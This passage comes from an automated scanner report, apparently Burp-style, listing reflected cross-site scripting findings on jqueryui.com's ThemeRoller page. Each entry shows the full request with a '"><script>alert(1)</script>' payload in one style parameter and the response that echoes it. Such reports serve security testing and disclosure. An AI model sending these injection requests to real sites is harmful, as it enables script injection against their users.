GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.pngfdc19"><script>alert(1)</script>ce6b6f37d34&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.pngfdc19"><script>alert(1)</script>ce6b6f37d34&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&icon
...[SNIP]...

4.146. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7a73"><script>alert(1)</script>ecfc02072aa was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.pngc7a73"><script>alert(1)</script>ecfc02072aa&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.pngc7a73"><script>alert(1)</script>ecfc02072aa&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRa
...[SNIP]...

4.147. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68388"><script>alert(1)</script>c2f5ccaa993 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png68388"><script>alert(1)</script>c2f5ccaa993&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Error=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png68388"><script>alert(1)</script>c2f5ccaa993&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px" type="text/css" media="all" />
...[SNIP]...

4.148. http://jqueryui.com/themeroller/ [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e580"><script>alert(1)</script>1fa0fca1bf5 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd8508e580"><script>alert(1)</script>1fa0fca1bf5&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd8508e580"><script>alert(1)</script>1fa0fca1bf5&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef
...[SNIP]...

4.149. http://jqueryui.com/themeroller/ [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95bac"><script>alert(1)</script>fd22abbdbef was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd95bac"><script>alert(1)</script>fd22abbdbef&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd95bac"><script>alert(1)</script>fd22abbdbef&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf
...[SNIP]...

4.150. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a6a4"><script>alert(1)</script>35255517304 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc2a6a4"><script>alert(1)</script>35255517304&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc2a6a4"><script>alert(1)</script>35255517304&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextu
...[SNIP]...

4.151. http://jqueryui.com/themeroller/ [borderColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 872b5"><script>alert(1)</script>9fff6b1c01 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a872b5"><script>alert(1)</script>9fff6b1c01&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120253

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a872b5"><script>alert(1)</script>9fff6b1c01&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacit
...[SNIP]...

4.152. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a120e"><script>alert(1)</script>942bd0c6a4c was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08a120e"><script>alert(1)</script>942bd0c6a4c&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
et%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08a120e"><script>alert(1)</script>942bd0c6a4c&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDe
...[SNIP]...

4.153. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4800b"><script>alert(1)</script>577c180fa0c was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f4800b"><script>alert(1)</script>577c180fa0c&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f4800b"><script>alert(1)</script>577c180fa0c&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=
...[SNIP]...

4.154. http://jqueryui.com/themeroller/ [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b6a"><script>alert(1)</script>69ecd42034e was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

